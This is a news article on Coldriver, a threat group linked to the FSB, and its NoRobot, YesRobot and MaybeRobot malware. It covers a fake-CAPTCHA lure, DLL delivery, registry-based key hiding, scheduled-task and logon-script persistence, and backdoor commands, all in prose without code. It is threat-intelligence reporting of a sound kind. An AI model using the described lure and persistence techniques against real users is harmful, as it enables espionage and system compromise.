Table of Contents
The Russian-affiliated hacking group Coldriver has been observed deploying a new malware set, according to researchers at the Google Threat Intelligence Group (GTIG).
This malware set, made of several families connected via a delivery chain, seems to have replaced Coldriver’s previous primary malware LostKeys since it was publicly disclosed in May 2025, said a GTIG report published on October 20.
The researchers noted that the new set was used more aggressively than any other previous malware campaigns ever attributed to the group.
This indicates a rapidly increased development and operations tempo from Coldriver, according to GTIG.
Coldriver’s Previous Campaigns
Coldriver, also known as Star Blizzard, Callisto and UNC4057, is a threat group with attributed links to Russia’s intelligence service, the FSB.
Active since at least 2017, the group is known to focus on credential phishing campaigns targeting high-profile NGOs, former intelligence and military officers and NATO governments for espionage purposes.
In December 2023, the UK’s National Cyber Security Centre (NCSC) said the group was behind a sustained cyber campaign aimed at interfering in UK politics and democratic processes.
In January 2024, Google observed the group going beyond phishing for credentials to delivering malware capable of exfiltrating sensitive information from the target.
In May 2025, GTIG detected that Coldriver had used a new malware strain, called LostKeys, in malicious campaigns between January and March of the same year.
This new strain has not been observed since the publication of the disclosure, GTIG said in its new October 20 report.
Inside Coldriver’s NoRobot, YesRobot and MaybeRobot
Instead, Coldriver seemed to have shifted to a new set of malware families tracked by Google as NoRobot, YesRobot and MaybeRobot.
The attack starts with a ‘ClickFix-style’ phishing lure, a fake CAPTCHA page designed to trick the victim into thinking they must verify they’re “not a robot.” This lure is tracked by Google as ColdCopy.
The page prompts the user to download and run a malicious dynamic-link library (DLL) – tracked as NoRobot – via rundll32.exe, a legitimate Windows tool. The DLL’s export function (humanCheck) is named to reinforce the CAPTCHA deception.
This replaces older methods that relied on PowerShell, making it harder for security tools that monitor script-based execution to detect the attack.
Once executed, the NoRobot DLL acts as a downloader. Early versions used a split-key cryptography scheme, with parts of the decryption key hidden in downloaded files and the Windows Registry (e.g. under HKEY_CURRENT_USER\SOFTWARE\Classes\.pietas). This makes analysis more difficult because missing any component would break the decryption.
NoRobot then fetches a self-extracting Python 3.8 installer, two encrypted Python scripts (libsystemhealthcheck.py and libcryptopydatasize.py) from a malicious domain (inspectguarantee[.]org) and a scheduled task to ensure the malware survived reboots.
The Python scripts are combined to decrypt and launch a minimal Python-based first-stage backdoor that communicates with a hardcoded command-and-control (C2) server over HTTPS, tracked as YesRobot.
GTIG noted that Coldriver abandoned YesRobot after just two weeks, likely because it was too cumbersome and easy to detect – notably because of the Python installation.
The researchers suggested that YesRobot served as a temporary stopgap after the group’s previous malware, LostKeys, was exposed.
Around June 2025, Coldriver switched to MaybeRobot, a more flexible PowerShell-based backdoor, with no Python script needed.
In this new version, NoRobot was simplified to fetch a single logon script that persisted MaybeRobot via a PowerShell command added to the user’s login script.
MaybeRobot uses a custom C2 protocol with three core commands:
- Download and execute a file from a URL
- Run a command via cmd.exe
- Execute a PowerShell block
Unlike YesRobot, MaybeRobot’s design is extensible, meaning operators can send complex commands dynamically, but the backdoor itself still lacks built-in features, such as automatic data exfiltration.
Coldriver Alternates Noisy and Stealthy NoRobot Infection Chains
Between June and September 2025, Coldriver evolved NoRobot, alternating between simplified and complex infection chains to hinder analysis while ensuring reliable delivery of its MaybeRobot PowerShell backdoor.
Minor but frequent changes, such as rotating infrastructure, filenames, and export functions, demonstrate Coldriver’s adaptive tradecraft, forcing defenders to capture multiple components to fully reconstruct attacks.
The GTIG report builds on a September Zscaler report, in which NoRobot is tracked as BaitSwitch and MaybeRobot as SimpleFix.